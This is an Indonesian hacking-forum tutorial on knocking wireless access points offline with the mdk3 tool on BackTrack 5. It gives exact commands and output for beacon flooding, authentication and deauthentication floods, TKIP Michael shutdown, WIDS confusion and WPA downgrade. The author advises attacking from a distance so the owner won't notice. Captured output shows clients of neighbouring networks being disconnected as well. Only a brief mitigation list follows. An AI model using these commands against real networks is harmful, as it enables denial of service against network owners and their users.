.:: Blackc0de Forum ::.
Would you like to react to this message? Create an account in a few clicks or log in to continue.

-=Explore The World From Our Binary=-
 
HomeIndeksLatest imagesPendaftaranLogin

 

 Kill Randomic Access Point

Go down 
PengirimMessage
Voldemort
BC Security
BC Security
Voldemort


Jumlah posting : 331
Points : 725
Reputation : 16
Join date : 04.07.11

Kill Randomic Access Point Empty
PostSubyek: Kill Randomic Access Point   Kill Randomic Access Point Icon_minitimeMon Jan 30, 2012 2:07 am

Hai all.... Akhirnya kita ketemu lagi... kali ini saya ingin membahas tentang
segala sesuatu tindakan destruktif terhadap jaringan wireless khususnya
penyerangan terhadap Access Point. Sungguh, tindakan yang saya paparkan ini
sangat destruktif sekali..jadi mohon maaf, jangan gunakan tindakan ini untuk
melakukan penyerangan terhadap jaringan wireless milik pemerintah. lembaga
pendidikan dan tangsi2 sosial lainnya.

-----[ Persiapan
[0] Wireless USB, saya mempergunakan 3 devices wireless USB yang support dengan
packet injection, yaitu :
. Intel Wireless 3945ABG (My internalnotebook Wireless)
Wireless devices ini saya gunakan untuk menjalankan Kismet dan Kismet Console.
. AirLive WL-360USB dengan antena Omni AirLive 10 dbi
Wireless devices ini saya gunakan untuk melakukan penyerangan pada Console 1.
. AirLive WL-1600USB dengan antena Omni AirLive 10 dbi
Wireless devices ini saya gunakan untuk melakukan penyerangan pada Console 2.

* Penyerangan dilakukan melalui 2 console agar AP yang menjadi target
mendapat serangan yang benar2 terserang.

* Saya mempergunakan antena omni 10 dbi agar dapat melakukan tindakan
penyerangan dari kejauhan... kalo dari deket nanti ketauan pemilik AP loh
... becarefull !!!

[1] Dalam penyerangan ini saya mempergunakan Linux BackTrack 5

[2] Tentu ada AP yang menjadi target !!! kali ini yang menjadi target adalah AP
milik kantor tempat saya bekerja yaitu : Linksys WRT54GL yang sudah diupgrade
firmwarenya meempergunakan DDWRT versi 2.4 SP1.

-----[ Tindakan Destruktif

Ada beberapa tindakan destruktif yang bisa dilakukan terhadap AP pada suatu
jaringan wireless, diantaranya :
[1] Beacon Flooding : tindakan penyerangan dengan mengirimkan "Beacon Frames"
dengan membuat banyak Fake AP. Tindakan ini akan mengakibatkan jaringan
wireless menjadi "crash" untuk beberapa waktu.

[2] Authentication DoS Mode : tindakan penyerangan dengan mengirimkan
"Authentication Frame" ke semua AP yang terditeksi dalam jaringan wireless.
Tindakan ini akan mengakibatkan client (user wireless) tidak bisa melakukan
koneksi ke AP, bahkan client (user wireless) yang sudah terkoneksi ke AP akan
ter-reset dan putus koneksi.

[3] Deauthentication / Disassociation Amok Mode : tindakan penyerangan dengan
memutuskan koneksi client (user wireless) ke AP. Tindakan ini akan
mengakibatkan tertendangnya "KickS" semua pemakai AP yang terkoneksi akibatnya
ya putus koneksi.

[4] Michael Shutdown Exploitation (TKIP) : tindakan memutuskan dan membatalkan
semua traffic yang menuju AP. Tindakan ini akan mengakibatkan client (user
wireless) tidak dapat melanjutkan traffic koneksi ke AP.

[5] WIDS/WIPS/WDS Confusion : tindakan pengacauan terhadap IDS dan IPS jaringan
wireless dan pengacauan WDS routing.

[6] MAC filter bruteforce mode : tindakan penyerangan terhadap AP yang memiliki
keamanan "MAC Filtering".

[7] WPA Downgrade test : tindakan penyerangan dengan mempergunakan
"deauthenticates Stations and AP" untuk melakukan pengiriman packet enkripsi
WPA yang mengakibatkan "WPA broken".


Bagaimana teknik penyerangan :
+-----------------------------------------------------------------+
| Memastikan devices wireless yang kita gunakan sudah terpasang : |
+-----------------------------------------------------------------+

root@bt:~# iwconfig

lo no wireless extensions.

eth0 no wireless extensions.

wlan0 IEEE 802.11bg Mode:Managed Access Point: Not-Associated
Tx-Power=0 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off

wlan1 IEEE 802.11abg Mode:Managed Access Point: Not-Associated
Tx-Power=0 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off

wlan2 IEEE 802.11bgn Mode:Managed Access Point: Not-Associated
Tx-Power=0 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:on

root@bt:~#
+----------------------------------------+
| Memastikan ada AP yang akan diserang : |
+----------------------------------------+
root@bt:~# airodump-ng wlan1

Hasil :

+--------------------------------------------------------------------------------------------------------+
|CH 11 ][ Elapsed: 2 mins ][ 2010-12-28 10:32 |
| |
| BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID |
| |
| 00:25:9C:C1:30:0E -37 484 0 0 11 54e. WPA TKIP PSK Hack_Me |
| 00:1E:C1:AB:35:9B -76 257 38 0 11 54 . OPN xxxxxxxxx_FreeHotSpotPremium |
| 00:1C:DF:A3:DC:B5 -78 318 124 0 6 54e WPA TKIP PSK engsun |
| 00:23:69:4F:D2:B2 -82 6 129 0 10 54 WPA TKIP PSK xxxxxxxxx_Hotspot_3 |
| |
| BSSID STATION PWR Rate Lost Packets Probes |
| |
| (not associated) 00:1E:64:32:A8:78 -77 0 - 1 0 5 xxxxxxxxx_FreeHotSpotPremium |
| (not associated) 00:26:69:24:3A:92 -79 0 - 1 0 23 |
| 00:1E:C1:AB:35:9B B4:82:FE:0A:53:51 -59 0 -12 0 109 |
| 00:1E:C1:AB:35:9B 00:26:5E:75:62:F7 -81 0 - 1 0 10 xxxxxxxxx_FreeHotSpotPremium |
| 00:23:69:4F:D2:B2 00:17:C4:78:D1:4B -61 1 - 1 34 157 xxxxxxxxx_Hotspot_3 |
+--------------------------------------------------------------------------------------------------------+

Perhatikan, yang menjadi target dalam kali ini adalah :
+------------------------------------------------------------------------------------+
| 00:25:9C:C1:30:0E -37 484 0 0 11 54e. WPA TKIP PSK Hack_Me |
+------------------------------------------------------------------------------------+

*semua ujicoba ini dilakukan pada AP milik kantor tempat saya bekerja !! dan
sudah mendapat izin dari saya sendiri karena saya administratornya..lol

+---------------------------------+
| Penyerangan : Beacon Flooding |
+---------------------------------+
command : ./mdk3 <wifi_interface> b -n <ssid_target>

. lakukan penyerangan pada 2 console :

console 1 :
root@bt:/pentest/wireless/mdk3# ./mdk3 wlan1 b -n Hack_Me

console 2 :
root@bt:/pentest/wireless/mdk3# ./mdk3 wlan2 b -n Hack_Me

Hasil :

Current MAC: C6:69:73:51:FF:4A on Channel 2 with SSID: Hack_Me
Current MAC: 46:7C:C2:54:F8:1B on Channel 14 with SSID: Hack_Me
Current MAC: FC:E4:66:DA:61:0B on Channel 7 with SSID: Hack_Me
Current MAC: B0:1E:6D:4A:4F:D1 on Channel 6 with SSID: Hack_Me
Current MAC: 76:CA:F2:AB:75:25 on Channel 11 with SSID: Hack_Me
-
-
-

Current MAC: 0F:BA:C0:57:2B:A4 on Channel 8 with SSID: Hack_Me
Current MAC: 13:9C:A8:EE:FF:43 on Channel 5 with SSID: Hack_Me
Current MAC: 99:BD:2C:CB:23:07 on Channel 13 with SSID: Hack_Me
Current MAC: F9:31:5B:28:05:0E on Channel 2 with SSID: Hack_Me
Packets sent: 8900 - Speed: 62 packets/sec

Hasil Penyerangan yang dipantau Kismet Console :
+-------------------------------------------------------------------------+
ÁãΩINFO: Detected new managed network "Hack_Me", BSSID 90:A5:F9:FB:33:1E,
ÁãΩ encryption no, channel 1, 11.00 mbit
ÁãΩINFO: Detected new managed network "Hack_Me", BSSID 22:EF:4F:65:73:9F,
ÁãΩ encryption no, channel 14, 11.00 mbit
ÁãΩINFO: Detected new managed network "Hack_Me", BSSID 86:FC:85:DA:6A:6F,
ÁãΩ encryption no, channel 3, 11.00 mbit
ÁãΩINFO: Detected new managed network "Hack_Me", BSSID FC:D0:7B:58:F5:4F,
ÁãΩ encryption no, channel 3, 11.00 mbit
ÁãΩINFO: Detected new managed network "Hack_Me", BSSID F1:DC:CC:81:81:C5,
ÁãΩ encryption no, channel 7, 11.00 mbit
ÁãΩINFO: Detected new managed network "Hack_Me", BSSID B4:E3:4A:D6:D2:99,
ÁãΩ encryption no, channel 13, 11.00 mbit
ÁãΩINFO: Detected new managed network "Hack_Me", BSSID 45:38:0C:CB:35:91,
ÁãΩ encryption no, channel 1, 11.00 mbit
ÁãΩINFO: Detected new managed network "Hack_Me", BSSID 9F:00:2C:9B:D0:A8,
ÁãΩ encryption no, channel 7, 11.00 mbit
ÁãΩINFO: Detected new managed network "Hack_Me", BSSID FC:2F:67:7C:BD:2B,
ÁãΩ encryption no, channel 4, 11.00 mbit
ÁãΩINFO: Detected new managed network "Hack_Me", BSSID 5C:AB:20:6E:80:3C,
ÁãΩ encryption no, channel 11, 11.00 mbit
+-------------------------------------------------------------------------+

* Lakukan teknik penyerangan ini selama kurang lebih (--pake txt susah bikin "
* + - "nih ) 20 menit saja, saya pastikan setelah
20 menit maka jaringan wireless akan "crash". Now.. say " Bye..bye...AP " lol

Makin lama melakukan penyerangan ini, maka makin banyak Fake AP yang tercipta
nah Fake AP inilah yang akan melakukan penyerangan dan menciptakan crash AP
yang menjadi target. Makin banyak Fake AP yang tercipta itu artinya juga makin
banyak client yang bingung melakukan koneksi ke AP karena nama SSID yang
dimiliki si Fake AP pun sama.

+----------------------------------------+
| Penyerangan : Authentication DoS Mode |
+----------------------------------------+

command : ./mdk3 <wifi_interface> a -a <mac_ap_target>

. lakukan penyerangan pada 2 console :

console 1 :
root@bt:/pentest/wireless/mdk3# ./mdk3 wlan1 a -a 00:25:9C:C1:30:0E


console 2 :
root@bt:/pentest/wireless/mdk3# ./mdk3 wlan2 a -a 00:25:9C:C1:30:0E

Hasil :

Device is still responding with 101000 clients connected!
AP 00:25:9C:C1:30:0E seems to be INVULNERABLE!
Device is still responding with 101500 clients connected!
Connecting Client: CE:2F:06:5A:53:43 to target AP: 00:25:9C:C1:30:0E
AP 00:25:9C:C1:30:0E seems to be INVULNERABLE!
-
-
-

AP 00:25:9C:C1:30:0E seems to be INVULNERABLE!
Device is still responding with 305500 clients connected!
AP 00:25:9C:C1:30:0E seems to be INVULNERABLE!
Device is still responding with 306000 clients connected!
Connecting Client: 61:13:0D:78:D8:7A to target AP: 00:25:9C:C1:30:0E
AP 00:25:9C:C1:30:0E seems to be INVULNERABLE!
Device is still responding with 306500 clients connected!

Hasil Penyerangan yang dipantau Kismet Console :
+-----------------------------------------------------------------------------+
ÁãΩLOCAL: Flushed protocol data backlog for Kismet client 12
ÁãΩLOCAL: Flushed protocol data backlog for Kismet client 15
ÁãΩLOCAL: Client 12 ring buffer full, storing Kismet protocol data in backlog
ÁãΩ vector
ÁãΩLOCAL: Client 15 ring buffer full, storing Kismet protocol data in backlog
ÁãΩ vector
ÁãΩLOCAL: Flushed protocol data backlog for Kismet client 12
ÁãΩLOCAL: Flushed protocol data backlog for Kismet client 15
ÁãΩLOCAL: Client 12 ring buffer full, storing Kismet protocol data in backlog
ÁãΩ vector
ÁãΩLOCAL: Client 15 ring buffer full, storing Kismet protocol data in backlog
ÁãΩ vector
ÁãΩLOCAL: Flushed protocol data backlog for Kismet client 12
ÁãΩLOCAL: Flushed protocol data backlog for Kismet client 15
ÁãΩLOCAL: Client 12 ring buffer full, storing Kismet protocol data in backlog
ÁãΩ vector
ÁãΩLOCAL: Client 15 ring buffer full, storing Kismet protocol data in backlog
ÁãΩ vector
ÁãΩLOCAL: Flushed protocol data backlog for Kismet client 12
ÁãΩLOCAL: Flushed protocol data backlog for Kismet client 15
ÁãΩ
+------------------------------------------------------------------------------+

* Lakukan teknik penyerangan ini selama kurang lebih 30 menit saja, saya
pastikan bahwa semua clients (user wifi) akan terputus dan tidak ada user
yang bisa melakukan koneksi ke AP. Kismet Console pun tak mampu
melakukan monitoring karena AP yang dimonitor mengalami "Ring Buffer Full. Now,
say "bye..bye...user " lol.

+-----------------------------------------------------------+
| Penyerangan : Deauthentication / Disassociation Amok Mode |
+-----------------------------------------------------------+

command : ./mdk3 <wifi_interface> d -c <channel_target>

. lakukan penyerangan pada 2 console :

console 1 :
root@bt:/pentest/wireless/mdk3# ./mdk3 wlan1 d -c 11

console 2 :
root@bt:/pentest/wireless/mdk3# ./mdk3 wlan2 d -c 11

Hasil :

Disconnecting between: 00:17:C4:78:D1:4B and: 00:23:69:4F:D2:B2 on channel: 11
Disconnecting between: FF:FF:FF:FF:FF:FF and: 00:1C:DF:A3:DC:B5 on channel: 11
Disconnecting between: FF:FF:FF:FF:FF:FF and: 00:1C:DF:A3:DC:B5 on channel: 11
Disconnecting between: 00:17:C4:78:D1:4B and: 00:23:69:4F:D2:B2 on channel: 11
Disconnecting between: 00:17:C4:78:D1:4B and: 00:23:69:4F:D2:B2 on channel: 11
Disconnecting between: FF:FF:FF:FF:FF:FF and: 00:1C:DF:A3:DC:B5 on channel: 11
-
-
-
Disconnecting between: 00:17:C4:78:D1:4B and: 00:23:69:4F:D2:B2 on channel: 11
Disconnecting between: 00:17:C4:78:D1:4B and: 00:23:69:4F:D2:B2 on channel: 11
Disconnecting between: FF:FF:FF:FF:FF:FF and: 00:1C:DF:A3:DC:B5 on channel: 11
Disconnecting between: FF:FF:FF:FF:FF:FF and: 00:1C:DF:A3:DC:B5 on channel: 11
Packets sent: 1325 - Speed: 12 packets/sec


Hasil Penyerangan yang dipantau Kismet Console :
+-------------------------------------------------------------------------------+
ÁãΩALERT: BCASTDISCON Network BSSID 00:1C:DF:A3:DC:B5 broadcast deauthenticate
ÁãΩ /disassociation of all clients, possible DoS
ÁãΩALERT: BCASTDISCON Network BSSID 00:1C:DF:A3:DC:B5 broadcast deauthenticate
ÁãΩ /disassociation of all clients, possible DoS
ÁãΩALERT: BCASTDISCON Network BSSID 00:1C:DF:A3:DC:B5 broadcast deauthenticate
ÁãΩ /disassociation of all clients, possible DoS
ÁãΩALERT: BCASTDISCON Network BSSID 00:1C:DF:A3:DC:B5 broadcast deauthenticate
ÁãΩ /disassociation of all clients, possible DoS
ÁãΩALERT: BCASTDISCON Network BSSID 00:1C:DF:A3:DC:B5 broadcast deauthenticate
ÁãΩ /disassociation of all clients, possible DoS
ÁãΩALERT: BCASTDISCON Network BSSID 00:1C:DF:A3:DC:B5 broadcast deauthenticate
ÁãΩ /disassociation of all clients, possible DoS
ÁãΩALERT: BCASTDISCON Network BSSID 00:1C:DF:A3:DC:B5 broadcast deauthenticate
ÁãΩ /disassociation of all clients, possible DoS
ÁãΩALERT: BCASTDISCON Network BSSID 00:1C:DF:A3:DC:B5 broadcast deauthenticate
ÁãΩ /disassociation of all clients, possible DoS
ÁãΩALERT: BCASTDISCON Network BSSID 00:1C:DF:A3:DC:B5 broadcast deauthenticate
ÁãΩ /disassociation of all clients, possible DoS
ÁãΩALERT: BCASTDISCON Network BSSID 00:1C:DF:A3:DC:B5 broadcast deauthenticate
ÁãΩ /disassociation of all clients, possible DoS
ÁãΩ
+--------------------------------------------------------------------------------+

* Lakukan teknik penyerangan ini selama kurang lebih 20 menit saja, saya
pastikan bahwa semua clients pada channel yand ditargetkan akan terputus.
Ingat..jika ada beberapa AP yang mepergunakan channel yang sama maka semua yg
berada pada channel tersebut yang menjadi target. Now, say " just having
fun....lol "

+----------------------------------------------------+
| Penyerangan : Michael shutdown exploitation (TKIP) |
+----------------------------------------------------+

command : ./mdk3 <wifi_interface> m -t <mac_ap_target>

. lakukan penyerangan pada 2 console :

console 1 :
root@bt:/pentest/wireless/mdk3# ./mdk3 wlan1 m -t 00:25:9C:C1:30:0E

console 2 :
root@bt:/pentest/wireless/mdk3# ./mdk3 wlan2 m -t 00:25:9C:C1:30:0E

Hasil :

Connecting Client: A7:13:C2:56:81:11 to target AP: 00:25:9C:C1:30:0E
AP 00:25:9C:C1:30:0E seems to be INVULNERABLE!
Device is still responding with 225000 clients connected!
AP 00:25:9C:C1:30:0E seems to be INVULNERABLE!
Device is still responding with 225500 clients connected!
Connecting Client: 5A:AC:9A:B7:02:41 to target AP: 00:25:9C:C1:30:0E
AP 00:25:9C:C1:30:0E seems to be INVULNERABLE!
Device is still responding with 226000 clients connected!
AP 00:25:9C:C1:30:0E seems to be INVULNERABLE!
Device is still responding with 226500 clients connected!
-
-
-
Connecting Client: 7C:49:90:FC:94:F4 to target AP: 00:25:9C:C1:30:0E
AP 00:25:9C:C1:30:0E seems to be INVULNERABLE!
Device is still responding with 319000 clients connected!
AP 00:25:9C:C1:30:0E seems to be INVULNERABLE!
Device is still responding with 319500 clients connected!
Connecting Client: 2C:7F:31:E3:8F:BC to target AP: 00:25:9C:C1:30:0E
AP 00:25:9C:C1:30:0E seems to be INVULNERABLE!
Device is still responding with 320000 clients connected!

Hasil Penyerangan yang dipantau Kismet Console :
+-----------------------------------------------------------------------------+
ÁãΩINFO: Detected new probe network "<Any>", BSSID 00:26:CC:43:E5:0B,
ÁãΩ encryption no, channel 0, 54.00 mbit
ÁãΩINFO: Kismet server accepted connection from 127.0.0.1
ÁãΩINFO: Detected new probe network "<Any>", BSSID 00:17:C4:78:D1:4B,
ÁãΩ encryption no, channel 0, 54.00 mbit
ÁãΩINFO: Detected new probe network "<Any>", BSSID 00:26:69:24:3A:92,
ÁãΩ encryption no, channel 0, 54.00 mbit
ÁãΩINFO: Detected new probe network "BinaInsani_FreeHotSpotPremium", BSSID 00:
ÁãΩ 26:5E:75:62:F7, encryption no, channel 0, 54.00 mbit
ÁãΩINFO: Saved data files
ÁãΩINFO: Detected new probe network "<Any>", BSSID E4:EC:10:7F:34:F9,
ÁãΩ encryption no, channel 0, 54.00 mbit
ÁãΩINFO: Detected new probe network "<Any>", BSSID 00:1E:64:32:A8:78,
ÁãΩ encryption no, channel 0, 54.00 mbit
ÁãΩINFO: Found IP range 192.168.5.22/255.255.255.254 for network
ÁãΩ 00:1E:C1:AB:35:9B
ÁãΩINFO: Detected new probe network "b71baru", BSSID 30:69:4B:DF:1E:D2,
ÁãΩ encryption no, channel 0, 54.00 mbit
ÁãΩINFO: Detected new probe network "<Any>", BSSID 00:26:82:00:95:27,
ÁãΩ encryption no, channel 0, 54.00 mbit
+------------------------------------------------------------------------------+
* Lakukan teknik penyerangan ini selama kurang lebih 30 menit saja, traffic
koneksi terhenti...koneksi terhenti...koneksi putus...putus....
Kismet Monitor pun hanya terdiam dan tidak mampu melakukan monitoring... Now,
say "bye...bye...AP lol"

+----------------------------------------------------+
| Penyerangan : WIDS/WIPS/WDS Confusion |
+----------------------------------------------------+

command : ./mdk3 <wifi_interface> w -e <ssid_target> -c <channel_AP> -z

. lakukan penyerangan pada 2 console :

console 1 :
root@bt:/pentest/wireless/mdk3# ./mdk3 wlan1 w -e Hack_Me -c 11 -z

console 2 :
root@bt:/pentest/wireless/mdk3# ./mdk3 wlan2 w -e Hack_Me -c 11 -z

Hasil :

Waiting 10 seconds for initialization...
Found AP: 00:25:9C:C1:30:0E on channel 11
Found Client: FF:FF:FF:FF:FF:FF on AP 00:25:9C:C1:30:0E
Found Client: 01:00:5E:00:00:FB on AP 00:25:9C:C1:30:0E

* Lakukan teknik penyerangan ini selama kurang lebih 30 menit saja, maka
wireless yang diset sebagai WDS akan mangalamai "Chaos".

+----------------------------------------------+
| Penyerangan : WPA Downgrade Test |
+----------------------------------------------+
* pengertian WPA downgrade disini bukan berarti menurunkan ekripsi WPA ke WEP
loh...;)

command : ./mdk3 <wifi_interface> g -t <mac_address_ap_target>

. lakukan penyerangan pada 2 console :

console 1 :
root@bt:/pentest/wireless/mdk3# ./mdk3 wlan1 g -t 00:25:9C:C1:30:0E

console 2 :
root@bt:/pentest/wireless/mdk3# ./mdk3 wlan2 g -t 00:25:9C:C1:30:0E

Hasil :

s: 67 Beacons/sec: 6
Deauth cycles: 100 802.1x authentication packets: 0 WEP/Unencrypted packets: 67 Beacons/sec: 3
Deauth cycles: 100 802.1x authentication packets: 0 WEP/Unencrypted packets: 67 Beacons/sec: 3
Deauth cycles: 100 802.1x authentication packets: 0 WEP/Unencrypted packets: 67 Beacons/sec: 5
Deauth cycles: 100 802.1x authentication packets: 0 WEP/Unencrypted packets: 67 Beacons/sec: 3
Deauth cycles: 100 802.1x authentication packets: 0 WEP/Unencrypted packets: 67 Beacons/sec: 4
Deauth cycles: 100 802.1x authentication packets: 0 WEP/Unencrypted packets: 67 Beacons/sec: 5
Deauth cycles: 100 802.1x authentication packets: 0 WEP/Unencrypted packets: 67 Beacons/sec: 4
Deauth cycles: 100 802.1x authentication packets: 0 WEP/Unencrypted packets: 67 Beacons/sec: 6
Deauth cycles: 100 802.1x authentication packets: 0 WEP/Unencrypted packets: 67 Beacons/sec: 1
-
-
-
Deauth cycles: 100 802.1x authentication packets: 0 WEP/Unencrypted packets: 67 Beacons/sec: 4
Deauth cycles: 100 802.1x authentication packets: 0 WEP/Unencrypted packets: 67 Beacons/sec: 4
Deauth cycles: 100 802.1x authentication packets: 0 WEP/Unencrypted packets: 67 Beacons/sec: 5
Deauth cycles: 100 802.1x authentication packets: 0 WEP/Unencrypted packets: 67 Beacons/sec: 0
NOTICE: Did not receive any beacons! Maybe AP has been reconfigured and/or is rebooting!
Packets sent: 432 - Speed: 0 packets/sec

Hasil Penyerangan yang dipantau Kismet Console :
+-------------------------------------------------------------------------------+
Ê•≥Á¨è Á¨è Á¨è Á¨
ÁãΩINFO: Detected new probe network "<Any>", BSSID 00:1E:64:32:A8:78,
ÁãΩ encryption no, channel 0, 54.00 mbit
ÁãΩINFO: Found IP range 192.168.5.22/255.255.255.254 for network
ÁãΩ 00:1E:C1:AB:35:9B
ÁãΩINFO: Detected new probe network "b71baru", BSSID 30:69:4B:DF:1E:D2,
ÁãΩ encryption no, channel 0, 54.00 mbit
ÁãΩINFO: Detected new probe network "<Any>", BSSID 00:26:82:00:95:27,
ÁãΩ encryption no, channel 0, 54.00 mbit
ÁãΩINFO: Saved data files
ÁãΩINFO: Saved data files
ÁãΩALERT: BCASTDISCON Network BSSID 00:25:9C:C1:30:0E broadcast deauthenticate
ÁãΩ /disassociation of all clients, possible DoS
ÁãΩINFO: Saved data files
ÁãΩALERT: BCASTDISCON Network BSSID 00:25:9C:C1:30:0E broadcast deauthenticate
ÁãΩ /disassociation of all clients, possible DoS
ÁãΩALERT: BCASTDISCON Network BSSID 00:25:9C:C1:30:0E broadcast deauthenticate
ÁãΩ /disassociation of all clients, possible DoS
ÁãΩALERT: BCASTDISCON Network BSSID 00:25:9C:C1:30:0E broadcast deauthenticate
ÁãΩ /disassociation of all clients, possible DoS
ÁãΩINFO: Saved data files
ÁãΩ
+--------------------------------------------------------------------------------+

* Lakukan teknik penyerangan ini selama kurang lebih 30 menit saja, Posible DoS !!!!!!!

-----[ Penanganan :
. Gunakan Wireless IDS, Wireless IPS
. Manfaatkan aplikasi AP monitoring utk pemantauan AP
. Dirikan beberapa Fake AP untuk mengacaukan target sebenarnya
. Hidden Your SSID, sekalipun Kismet bisa menembusnya....lol

Akhirnya selesai juga menulis tindak kejahatan pada wireless kali ini... semoga
tidak menjadi bahan kotor buat otak Anda... buang saja tulisan ini jika merasa
tidak bermanfaat dalam kehidupan Anda. Sungguh... sejahat2nya ilmu tetaplah
ilmu..... semoga bisa menjadi kebaikan....

wassalam,
thx bwt om lirva32.
Kembali Ke Atas Go down
 
Kill Randomic Access Point
Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» CHEAT NINJA SAGA ( NPC + GOLD 50M + RESET POINT + 1 HIT KILL)
» deauth Access Point / client
» Tutorial Mikrotik VPN : Point to Point Tunnel Protocol (PPTP)
» Cheat Point Blank Wallhack Black Update Point Blank
» Point to Point dengan Ubiquiti Rocket-M5 5.8Ghz menggunakan Antenna Ubiquiti RocketDisk 5.8Ghz 30dBi

Permissions in this forum:Anda tidak dapat menjawab topik
.:: Blackc0de Forum ::. :: Information Technology :: Network Attack-
Navigasi: